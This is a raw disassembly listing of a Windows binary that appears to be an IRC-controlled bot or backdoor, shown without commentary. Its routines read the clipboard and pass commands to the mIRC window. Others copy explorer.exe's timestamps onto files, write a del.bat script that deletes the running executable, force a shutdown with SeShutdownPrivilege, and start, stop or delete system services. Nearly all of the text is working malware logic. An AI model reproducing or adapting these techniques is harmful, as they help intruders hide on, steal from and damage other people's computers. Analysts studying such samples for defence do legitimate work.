cmp dword_42EB34, ebx
mov dword_42EC24, eax
jz short loc_406A38
cmp eax, ebx
jnz short loc_406A42
jmp short loc_406A38
; ---------------------------------------------------------------------------
loc_406A2D: ; CODE XREF: sub_405EFF+B04�j
call ds:dword_41B060 ; RtlGetLastWin32Error
mov dword_42ECCC, eax
loc_406A38: ; CODE XREF: sub_405EFF+B26�j
; sub_405EFF+B2C�j
mov dword_42ECC8, 1
loc_406A42: ; CODE XREF: sub_405EFF+B2A�j
push offset aOdbc32_dll ; "odbc32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_406ACB
push offset aSqldriverconne ; "SQLDriverConnect"
push edi
call esi ; GetProcAddress
push offset aSqlsetenvattr ; "SQLSetEnvAttr"
push edi
mov dword_42EBEC, eax
call esi ; GetProcAddress
push offset aSqlexecdirect ; "SQLExecDirect"
push edi
mov dword_42EC38, eax
call esi ; GetProcAddress
push offset aSqlallochandle ; "SQLAllocHandle"
push edi
mov dword_42EB7C, eax
call esi ; GetProcAddress
push offset aSqlfreehandle ; "SQLFreeHandle"
push edi
mov dword_42EB44, eax
call esi ; GetProcAddress
push offset aSqldisconnect ; "SQLDisconnect"
push edi
mov dword_42EBD0, eax
call esi ; GetProcAddress
cmp dword_42EBEC, ebx
mov dword_42EB4C, eax
jz short loc_406AD6
cmp dword_42EC38, ebx
jz short loc_406AD6
cmp dword_42EB7C, ebx
jz short loc_406AD6
cmp dword_42EB44, ebx
jz short loc_406AD6
cmp dword_42EBD0, ebx
jz short loc_406AD6
cmp eax, ebx
jnz short loc_406AE0
jmp short loc_406AD6
; ---------------------------------------------------------------------------
loc_406ACB: ; CODE XREF: sub_405EFF+B4E�j
call ds:dword_41B060 ; RtlGetLastWin32Error
mov dword_42ECD4, eax
loc_406AD6: ; CODE XREF: sub_405EFF+BA4�j
; sub_405EFF+BAC�j ...
mov dword_42ECD0, 1
loc_406AE0: ; CODE XREF: sub_405EFF+BC8�j
push 1
pop eax
pop edi
pop esi
pop ebp
pop ebx
retn
sub_405EFF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_406AE8(int,char *Str,int,int)
sub_406AE8 proc near ; CODE XREF: sub_409557+4A6B�p
Dest = byte ptr -200h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+Str]
push esi
xor esi, esi
cmp dword_42EC70, esi
push edi
mov edi, [ebp+arg_8]
jz short loc_406B30
push dword_42EC74
lea eax, [ebp+Dest]
push offset aKernel32_dllFa ; "Kernel32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_405E64
add esp, 20h
loc_406B30: ; CODE XREF: sub_406AE8+1A�j
cmp dword_42EC78, esi
jz short loc_406B64
push dword_42EC7C
lea eax, [ebp+Dest]
push offset aUser32_dllFail ; "User32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_405E64
add esp, 20h
loc_406B64: ; CODE XREF: sub_406AE8+4E�j
cmp dword_42EC80, esi
jz short loc_406B98
push dword_42EC84
lea eax, [ebp+Dest]
push offset aAdvapi32_dllFa ; "Advapi32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_405E64
add esp, 20h
loc_406B98: ; CODE XREF: sub_406AE8+82�j
cmp dword_42EC88, esi
jz short loc_406BCC
push dword_42EC8C
lea eax, [ebp+Dest]
push offset aGdi32_dllFaile ; "Gdi32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_405E64
add esp, 20h
loc_406BCC: ; CODE XREF: sub_406AE8+B6�j
cmp dword_42EC90, esi
jz short loc_406C00
push dword_42EC94
lea eax, [ebp+Dest]
push offset aWs2_32_dllFail ; "Ws2_32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_405E64
add esp, 20h
loc_406C00: ; CODE XREF: sub_406AE8+EA�j
cmp dword_42EC98, esi
jz short loc_406C34
push dword_42EC9C
lea eax, [ebp+Dest]
push offset aWininet_dllFai ; "Wininet.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_405E64
add esp, 20h
loc_406C34: ; CODE XREF: sub_406AE8+11E�j
cmp dword_42ECA0, esi
jz short loc_406C68
push dword_42ECA4
lea eax, [ebp+Dest]
push offset aIcmp_dllFailed ; "Icmp.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_405E64
add esp, 20h
loc_406C68: ; CODE XREF: sub_406AE8+152�j
cmp dword_42ECA8, esi
jz short loc_406C9C
push dword_42ECAC
lea eax, [ebp+Dest]
push offset aNetapi32_dllFa ; "Netapi32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_405E64
add esp, 20h
loc_406C9C: ; CODE XREF: sub_406AE8+186�j
cmp dword_42ECB0, esi
jz short loc_406CD0
push dword_42ECB4
lea eax, [ebp+Dest]
push offset aDnsapi_dllFail ; "Dnsapi.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_405E64
add esp, 20h
loc_406CD0: ; CODE XREF: sub_406AE8+1BA�j
cmp dword_42ECB8, esi
jz short loc_406D04
push dword_42ECBC
lea eax, [ebp+Dest]
push offset aIphlpapi_dllFa ; "Iphlpapi.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_405E64
add esp, 20h
loc_406D04: ; CODE XREF: sub_406AE8+1EE�j
cmp dword_42ECC0, esi
jz short loc_406D38
push dword_42ECC4
lea eax, [ebp+Dest]
push offset aMpr32_dllFaile ; "Mpr32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_405E64
add esp, 20h
loc_406D38: ; CODE XREF: sub_406AE8+222�j
cmp dword_42ECC8, esi
jz short loc_406D6C
push dword_42ECCC
lea eax, [ebp+Dest]
push offset aShell32_dllFai ; "Shell32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_405E64
add esp, 20h
loc_406D6C: ; CODE XREF: sub_406AE8+256�j
cmp dword_42ECD0, esi
jz short loc_406DA0
push dword_42ECD4
lea eax, [ebp+Dest]
push offset aOdbc32_dllFail ; "Odbc32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_405E64
add esp, 20h
loc_406DA0: ; CODE XREF: sub_406AE8+28A�j
lea eax, [ebp+Dest]
push offset aMainDllTestCom ; "[MAIN]: DLL test complete."
push eax ; Dest
call _sprintf
cmp [ebp+arg_C], esi
pop ecx
pop ecx
jnz short loc_406DCD
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_405E64
add esp, 14h
loc_406DCD: ; CODE XREF: sub_406AE8+2CE�j
lea eax, [ebp+Dest]
push eax
call sub_402D63
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_406AE8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_406DDF(char *Src,char *SubStr,char *Source)
sub_406DDF proc near ; CODE XREF: sub_409557+93D�p
; sub_409557+971�p ...
Src = dword ptr 8
SubStr = dword ptr 0Ch
Source = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+Src]
xor esi, esi
cmp edi, esi
jz short loc_406E6A
mov eax, [ebp+SubStr]
cmp eax, esi
jz short loc_406E6A
cmp [ebp+Source], esi
jz short loc_406E6A
cmp byte ptr [eax], 0
jz short loc_406E6A
push ebx
push edi ; Src
call __strdup
mov ebx, eax
pop ecx
test ebx, ebx
jz short loc_406E65
push [ebp+SubStr] ; SubStr
push edi ; Str
call _strstr
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_406E5E
sub eax, edi
push eax ; Count
push edi ; Source
push ebx ; Dest
call _strncpy
push [ebp+Source] ; Str
mov eax, ebx
sub eax, edi
and byte ptr [eax+esi], 0
call _strlen
push eax ; Count
push [ebp+Source] ; Source
push ebx ; Dest
call _strncat
push [ebp+SubStr] ; Str
call _strlen
add eax, esi
push eax ; Source
push ebx ; Dest
call _strcat
push ebx ; Source
push edi ; Dest
call _strcpy
add esp, 30h
mov esi, edi
loc_406E5E: ; CODE XREF: sub_406DDF+3C�j
push ebx ; Memory
call _free
pop ecx
loc_406E65: ; CODE XREF: sub_406DDF+2B�j
mov eax, esi
pop ebx
jmp short loc_406E6C
; ---------------------------------------------------------------------------
loc_406E6A: ; CODE XREF: sub_406DDF+C�j
; sub_406DDF+13�j ...
xor eax, eax
loc_406E6C: ; CODE XREF: sub_406DDF+89�j
pop edi
pop esi
pop ebp
retn
sub_406DDF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_406E70(char *Str,int)
sub_406E70 proc near ; CODE XREF: sub_405C73+F4�p
; sub_4093DF+E9�p
Dst = dword ptr -7D0h
var_7CC = byte ptr -7CCh
Str = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 7D0h
push ebx
push esi
push 7D0h ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
mov esi, [ebp+Str]
push esi ; Str
call _strlen
add esp, 10h
push 1
pop ebx
cmp eax, ebx
jge short loc_406EA6
or eax, 0FFFFFFFFh
jmp short loc_406F19
; ---------------------------------------------------------------------------
loc_406EA6: ; CODE XREF: sub_406E70+2F�j
xor ecx, ecx
mov [ebp+Dst], esi
test eax, eax
jle short loc_406EC8
loc_406EB2: ; CODE XREF: sub_406E70+56�j
mov dl, [ecx+esi]
cmp dl, 0Ah
jz short loc_406EBF
cmp dl, 0Dh
jnz short loc_406EC3
loc_406EBF: ; CODE XREF: sub_406E70+48�j
and byte ptr [ecx+esi], 0
loc_406EC3: ; CODE XREF: sub_406E70+4D�j
inc ecx
cmp ecx, eax
jl short loc_406EB2
loc_406EC8: ; CODE XREF: sub_406E70+40�j
xor edx, edx
push edi
test eax, eax
jle short loc_406EF9
lea edi, [ebp+var_7CC]
loc_406ED5: ; CODE XREF: sub_406E70+87�j
cmp byte ptr [edx+esi], 0
jnz short loc_406EF4
cmp byte ptr [edx+esi+1], 0
lea ecx, [edx+esi+1]
jz short loc_406EF4
cmp ebx, 1F4h
jge short loc_406EF9
mov [edi], ecx
inc ebx
add edi, 4
loc_406EF4: ; CODE XREF: sub_406E70+69�j
; sub_406E70+74�j
inc edx
cmp edx, eax
jl short loc_406ED5
loc_406EF9: ; CODE XREF: sub_406E70+5D�j
; sub_406E70+7C�j
cmp [ebp+arg_4], 0
pop edi
jz short loc_406F17
lea eax, [ebp+Dst]
push 7D0h ; Size
push eax ; Src
push [ebp+arg_4] ; Dst
call _memcpy
add esp, 0Ch
loc_406F17: ; CODE XREF: sub_406E70+8E�j
mov eax, ebx
loc_406F19: ; CODE XREF: sub_406E70+34�j
pop esi
pop ebx
leave
retn
sub_406E70 endp
; =============== S U B R O U T I N E =======================================
sub_406F1D proc near ; CODE XREF: sub_406F77+33�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_4]
push esi
push edi
mov edi, [esp+8+arg_8]
mov ecx, 1F4h
xor esi, esi
rep stosd
lea edi, [eax-1]
test edi, edi
jl short loc_406F56
push ebx
mov ebx, edi
loc_406F3A: ; CODE XREF: sub_406F1D+36�j
mov eax, [esp+0Ch+arg_0]
mov al, [esi+eax]
push eax
call sub_406F59
pop ecx
inc esi
mov ecx, [esp+0Ch+arg_8]
mov [ecx+eax*4], ebx
dec ebx
cmp esi, edi
jle short loc_406F3A
pop ebx
loc_406F56: ; CODE XREF: sub_406F1D+18�j
pop edi
pop esi
retn
sub_406F1D endp
; =============== S U B R O U T I N E =======================================
sub_406F59 proc near ; CODE XREF: sub_406F1D+25�p
; sub_406F77+6B�p
arg_0 = byte ptr 4
movsx eax, [esp+arg_0]
push eax ; C
call _tolower ; _tolower
cmp al, 61h
pop ecx
jl short loc_406F74
cmp al, 7Ah
jg short loc_406F74
movsx eax, al
sub eax, 60h
retn
; ---------------------------------------------------------------------------
loc_406F74: ; CODE XREF: sub_406F59+E�j
; sub_406F59+12�j
xor eax, eax
retn
sub_406F59 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_406F77(char *Str,int)
sub_406F77 proc near ; CODE XREF: sub_402E43+10�p
; sub_402E75+A0�p
var_100C = dword ptr -100Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Str = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 100Ch
call __alloca_probe
push ebx
push esi
push edi
push [ebp+Str] ; Str
call _strlen
push [ebp+arg_4] ; Str
mov [ebp+var_4], eax
call _strlen
mov esi, eax
lea eax, [ebp+var_100C]
push eax
push esi
push [ebp+arg_4]
mov [ebp+var_C], esi
call sub_406F1D
add esp, 14h
dec esi
mov edi, esi
loc_406FB5: ; CODE XREF: sub_406F77+B6�j
test esi, esi
jle short loc_407033
mov eax, [ebp+arg_4]
movsx eax, byte ptr [esi+eax]
push eax ; C
call _tolower ; _tolower
mov ebx, eax
mov eax, [ebp+Str]
movsx eax, byte ptr [edi+eax]
push eax ; C
call _tolower ; _tolower
pop ecx
cmp eax, ebx
pop ecx
jz short loc_40702B
loc_406FDB: ; CODE XREF: sub_406F77+B2�j
mov ebx, [ebp+Str]
mov al, [edi+ebx]
push eax
call sub_406F59
mov edx, [ebp+var_C]
mov eax, [ebp+eax*4+var_100C]
pop ecx
mov ecx, edx
sub ecx, esi
cmp ecx, eax
jle short loc_406FFC
mov eax, ecx
loc_406FFC: ; CODE XREF: sub_406F77+81�j
add edi, eax
cmp edi, [ebp+var_4]
jge short loc_40702F
mov eax, [ebp+arg_4]
lea esi, [edx-1]
movsx eax, byte ptr [esi+eax]
push eax ; C
call _tolower ; _tolower
mov edx, eax
movsx eax, byte ptr [edi+ebx]
push eax ; C
mov [ebp+var_8], edx
call _tolower ; _tolower
pop ecx
pop ecx
mov ecx, [ebp+var_8]
cmp eax, ecx
jnz short loc_406FDB
loc_40702B: ; CODE XREF: sub_406F77+62�j
dec edi
dec esi
jmp short loc_406FB5
; ---------------------------------------------------------------------------
loc_40702F: ; CODE XREF: sub_406F77+8A�j
xor eax, eax
jmp short loc_407038
; ---------------------------------------------------------------------------
loc_407033: ; CODE XREF: sub_406F77+40�j
mov eax, [ebp+Str]
add eax, edi
loc_407038: ; CODE XREF: sub_406F77+BA�j
pop edi
pop esi
pop ebx
leave
retn
sub_406F77 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40703D proc near ; CODE XREF: sub_409557+34DA�p
; sub_409557+3E83�p
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 100h
push esi
call ds:dword_41B060 ; RtlGetLastWin32Error
mov esi, eax
push 0
lea eax, [ebp+var_100]
push 100h
push eax
push 400h
push esi
push 0
push 1200h
call ds:dword_41B0D0 ; FormatMessageA
lea eax, [ebp+var_100]
loc_407076: ; CODE XREF: sub_40703D+46�j
mov cl, [eax]
cmp cl, 1Fh
loc_40707B: ; DATA XREF: .data:0041E4C0�o
; .data:0041E4D4�o ...
jg short loc_407082
cmp cl, 9
jnz short loc_407085
loc_407082: ; CODE XREF: sub_40703D:loc_40707B�j
inc eax
jmp short loc_407076
; ---------------------------------------------------------------------------
loc_407085: ; CODE XREF: sub_40703D+43�j
; sub_40703D+5B�j ...
and byte ptr [eax], 0
dec eax
lea ecx, [ebp+var_100]
cmp eax, ecx
jb short loc_40709F
mov cl, [eax]
cmp cl, 2Eh
jz short loc_407085
cmp cl, 21h
jl short loc_407085
loc_40709F: ; CODE XREF: sub_40703D+54�j
lea eax, [ebp+var_100]
push esi
push eax
mov esi, offset byte_42ECE0
push [ebp+arg_0]
push offset aSErrorSD_ ; "%s Error: %s <%d>."
push 200h ; Count
push esi ; Dest
call __snprintf
add esp, 18h
mov eax, esi
pop esi
leave
retn
sub_40703D endp
; =============== S U B R O U T I N E =======================================
sub_4070C7 proc near ; CODE XREF: sub_409557+49F7�p
push esi
push 0
call dword_42EB84 ; OpenClipboard
test eax, eax
jz short loc_4070FE
push 1
call dword_42EBA4 ; GetClipboardData
mov esi, eax
test esi, esi
jz short loc_4070FE
push edi
push esi
call ds:dword_41B0D8 ; GlobalLock
push esi
mov edi, eax
call ds:dword_41B0D4 ; GlobalUnlock
call dword_42EC04 ; CloseClipboard
mov eax, edi
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_4070FE: ; CODE XREF: sub_4070C7+B�j
; sub_4070C7+19�j
xor eax, eax
pop esi
retn
sub_4070C7 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_407102(char *Format)
sub_407102 proc near ; CODE XREF: sub_409557+3E32�p
Format = dword ptr 4
push ebp
push esi
push edi
xor esi, esi
mov edi, offset aMirc_0 ; "mIRC"
push esi
push edi
call dword_42EBC0 ; FindWindowA
mov ebp, eax
cmp ebp, esi
jz short loc_40717E
push ebx
push edi
push 1000h
push esi
push 4
push esi
push 0FFFFFFFFh
call ds:dword_41B0E4 ; CreateFileMappingA
push esi
push esi
mov edi, eax
push esi
push 0F001Fh
push edi
call ds:dword_41B0E0 ; MapViewOfFile
push [esp+10h+Format] ; Format
mov ebx, eax
push ebx ; Dest
call _sprintf
pop ecx
pop ecx
push esi
push 1
push 4C8h
push ebp
call dword_42EC0C ; SendMessageA
push esi
push 1
push 4C9h
push ebp
call dword_42EC0C ; SendMessageA
push ebx
call ds:dword_41B0DC ; UnmapViewOfFile
push edi
call ds:dword_41B050 ; CloseHandle
push 1
pop eax
pop ebx
jmp short loc_407180
; ---------------------------------------------------------------------------
loc_40717E: ; CODE XREF: sub_407102+16�j
xor eax, eax
loc_407180: ; CODE XREF: sub_407102+7A�j
pop edi
pop esi
pop ebp
retn
sub_407102 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407184 proc near ; CODE XREF: WinMain(x,x,x,x)+212�p
var_11C = byte ptr -11Ch
var_18 = byte ptr -18h
var_10 = byte ptr -10h
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 11Ch
push ebx
push esi
xor esi, esi
push edi
lea eax, [ebp+var_11C]
push esi
push eax
push 104h
push esi
push offset aExplorer_exe ; "explorer.exe"
push esi
call dword_42EC6C ; SearchPathA
test eax, eax
jz short loc_407223
mov edi, 80h
push esi
push edi
push 3
push esi
mov esi, ds:dword_41B05C
push 1
lea eax, [ebp+var_11C]
push 80000000h
push eax
call esi ; CreateFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_407223
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push ebx
call ds:dword_41B0EC ; GetFileTime
push ebx
mov ebx, ds:dword_41B050
call ebx ; CloseHandle
push 0
push edi
push 3
push 0
push 2
push 40000000h
push [ebp+arg_0]
call esi ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_407223
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push esi
call ds:dword_41B0E8 ; SetFileTime
push esi
call ebx ; CloseHandle
loc_407223: ; CODE XREF: sub_407184+2A�j
; sub_407184+51�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_407184 endp
; =============== S U B R O U T I N E =======================================
sub_407228 proc near ; CODE XREF: sub_409557+1014�p
push 1
push offset aSeshutdownpriv ; "SeShutdownPrivilege"
call sub_408849
pop ecx
pop ecx
push 50005h
push 6
call dword_42EB0C ; ExitWindowsEx
neg eax
sbb eax, eax
neg eax
retn
sub_407228 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40724A proc near ; CODE XREF: sub_403520+472�p
; sub_409557+4C67�p
Str = byte ptr -764h
var_364 = byte ptr -364h
Dest = byte ptr -260h
var_15C = byte ptr -15Ch
var_58 = dword ptr -58h
var_4C = dword ptr -4Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
Dst = byte ptr -14h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 764h
push esi
xor esi, esi
cmp dword_424A5C, esi
push edi
jz short loc_40726E
cmp dword_42EC80, esi
jnz short loc_40726E
push esi ; Str
call sub_402FA4
pop ecx
loc_40726E: ; CODE XREF: sub_40724A+13�j
; sub_40724A+1B�j
call sub_411E03
lea eax, [ebp+Str]
push eax
push 400h
call ds:dword_41B0F4 ; GetTempPathA
lea eax, [ebp+Str]
push eax
lea eax, [ebp+Dest]
push offset aSdel_bat ; "%sdel.bat"
push eax ; Dest
call _sprintf
add esp, 0Ch
lea eax, [ebp+Dest]
push esi
push esi
push 2
push esi
push esi
push 40000000h
push eax
call ds:dword_41B05C ; CreateFileA
mov edi, eax
cmp edi, esi
jbe loc_4073CE
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+Str]
push offset a@echoOffRepeat ; "@echo off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"...
push eax ; Dest
call _sprintf
add esp, 0Ch
lea eax, [ebp+var_4]
push esi
push eax
lea eax, [ebp+Str]
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
push eax
push edi
call ds:dword_41B054 ; WriteFile
push edi
call ds:dword_41B050 ; CloseHandle
push 10h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
push 44h
lea eax, [ebp+var_58]
pop edi
push edi ; Size
push esi ; Val
push eax ; Dst
call _memset
add esp, 18h
mov [ebp+var_58], edi
mov edi, 104h
lea eax, [ebp+var_15C]
push edi
push eax
push esi
mov [ebp+var_4C], offset byte_428D64
mov [ebp+var_2C], 1
mov [ebp+var_28], si
call ds:dword_41B0CC ; GetModuleHandleA
push eax
call ds:dword_41B068 ; GetModuleFileNameA
lea eax, [ebp+var_15C]
push eax
call ds:dword_41B0A8 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_407376
lea eax, [ebp+var_15C]
push 80h
push eax
call ds:dword_41B000 ; SetFileAttributesA
loc_407376: ; CODE XREF: sub_40724A+118�j
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+Str]
push offset aComspecCSS ; "%%comspec%% /c %s %s"
push eax ; Dest
call _sprintf
add esp, 10h
lea eax, [ebp+var_364]
push edi
push eax
lea eax, [ebp+Str]
push eax
call ds:dword_41B0F0 ; ExpandEnvironmentStringsA
lea eax, [ebp+Dst]
push eax
lea eax, [ebp+var_58]
push eax
push esi
push esi
push 4008h
push 1
push esi
lea eax, [ebp+var_364]
push esi
push eax
push esi
call ds:dword_41B094 ; CreateProcessA
loc_4073CE: ; CODE XREF: sub_40724A+72�j
pop edi
pop esi
leave
retn
sub_40724A endp
; =============== S U B R O U T I N E =======================================
sub_4073D2 proc near ; CODE XREF: sub_409557:loc_40AE4A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
push edi
mov edi, [esp+8+arg_4]
test edi, edi
jz short loc_407437
lea esi, [eax+eax*2]
push 0
shl esi, 2
push 0
push dword_4210E8[esi]
push edi
push eax
call sub_407459
add esp, 14h
test eax, eax
jnz short loc_40741A
push edi
push off_4210E4[esi]
mov esi, offset byte_42F5A4
push offset aNetSServiceS_ ; "[NET]: %s service: '%s'."
push esi ; Dest
call _sprintf
add esp, 10h
jmp short loc_407454
; ---------------------------------------------------------------------------
loc_40741A: ; CODE XREF: sub_4073D2+2A�j
push eax
call sub_4074FB
push eax
push edi
mov esi, offset byte_42F5A4
push offset aNetErrorWithSe ; "[NET]: Error with service: '%s'. %s"
push esi ; Dest
call _sprintf
add esp, 14h
jmp short loc_407454
; ---------------------------------------------------------------------------
loc_407437: ; CODE XREF: sub_4073D2+C�j
lea eax, [eax+eax*2]
mov esi, offset byte_42F5A4
push off_4210E0[eax*4]
push offset aNetSNoServiceS ; "[NET]: %s: No service specified."
push esi ; Dest
call _sprintf
add esp, 0Ch
loc_407454: ; CODE XREF: sub_4073D2+46�j
; sub_4073D2+63�j
mov eax, esi
pop edi
pop esi
retn
sub_4073D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407459 proc near ; CODE XREF: sub_4073D2+20�p
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
call dword_42EBA8 ; OpenSCManagerA
mov edi, eax
cmp edi, ebx
jnz short loc_407480
call ds:dword_41B060 ; RtlGetLastWin32Error
mov ebx, eax
jmp short loc_4074F5
; ---------------------------------------------------------------------------
loc_407480: ; CODE XREF: sub_407459+1B�j
push esi
push 0F01FFh
push [ebp+arg_4]
push edi
call dword_42EAAC ; OpenServiceA
mov esi, eax
cmp esi, ebx
jnz short loc_4074A0
call ds:dword_41B060 ; RtlGetLastWin32Error
mov ebx, eax
jmp short loc_4074ED
; ---------------------------------------------------------------------------
loc_4074A0: ; CODE XREF: sub_407459+3B�j
mov eax, [ebp+arg_0]
cmp eax, 1
jz short loc_4074D3
cmp eax, 3
jz short loc_4074C4
jle short loc_4074E6
cmp eax, 6
jg short loc_4074E6
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_8]
push esi
call dword_42EB14 ; ControlService
jmp short loc_4074DA
; ---------------------------------------------------------------------------
loc_4074C4: ; CODE XREF: sub_407459+52�j
push [ebp+arg_10]
push [ebp+arg_C]
push esi
call dword_42EAB4 ; StartServiceA
jmp short loc_4074DA
; ---------------------------------------------------------------------------
loc_4074D3: ; CODE XREF: sub_407459+4D�j
push esi
call dword_42EB18 ; DeleteService
loc_4074DA: ; CODE XREF: sub_407459+69�j
; sub_407459+78�j
test eax, eax
jnz short loc_4074E6
call ds:dword_41B060 ; RtlGetLastWin32Error
mov ebx, eax
loc_4074E6: ; CODE XREF: sub_407459+54�j
; sub_407459+59�j ...
push esi
call dword_42EAC8 ; CloseServiceHandle
loc_4074ED: ; CODE XREF: sub_407459+45�j
push edi
call dword_42EAC8 ; CloseServiceHandle
pop esi
loc_4074F5: ; CODE XREF: sub_407459+25�j
mov eax, ebx
pop edi
pop ebx
leave
retn
sub_407459 endp
; =============== S U B R O U T I N E =======================================
sub_4074FB proc near ; CODE XREF: sub_4073D2+49�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, 420h
cmp eax, ecx
ja loc_4075B0
jz loc_4075A9
add ecx, 0FFFFFFFBh
cmp eax, ecx
ja short loc_407573
jz short loc_407569
mov ecx, eax
sub ecx, 3
jz short loc_40755F
dec ecx
dec ecx
jz short loc_407555
dec ecx
jz short loc_40754B
sub ecx, 51h
jz short loc_407541
sub ecx, 24h
jnz loc_407626 ; default
; jumptable 004075CD cases 1,5,6,8,9,12,13,15,16
push offset aTheSpecifiedSe ; "The specified service name is invalid."
jmp loc_407618
; ---------------------------------------------------------------------------
loc_407541: ; CODE XREF: sub_4074FB+31�j
push offset aTheRequestedCo ; "The requested control code is undefined"...
jmp loc_407618
; ---------------------------------------------------------------------------
loc_40754B: ; CODE XREF: sub_4074FB+2C�j
push offset aTheHandleIsInv ; "The handle is invalid."
jmp loc_407618
; ---------------------------------------------------------------------------
loc_407555: ; CODE XREF: sub_4074FB+29�j
push offset aTheHandleDoesN ; "The handle does not have the required a"...
jmp loc_407618
; ---------------------------------------------------------------------------
loc_40755F: ; CODE XREF: sub_4074FB+25�j
push offset aTheServiceBina ; "The service binary file could not be fo"...
jmp loc_407618
; ---------------------------------------------------------------------------
loc_407569: ; CODE XREF: sub_4074FB+1E�j
push offset aTheServiceCann ; "The service cannot be stopped because o"...
jmp loc_407618
; ---------------------------------------------------------------------------
loc_407573: ; CODE XREF: sub_4074FB+1C�j
mov ecx, eax
sub ecx, 41Ch
jz short loc_4075A2
dec ecx
jz short loc_40759B
dec ecx
jz short loc_407594
dec ecx
jnz loc_407626 ; default
; jumptable 004075CD cases 1,5,6,8,9,12,13,15,16
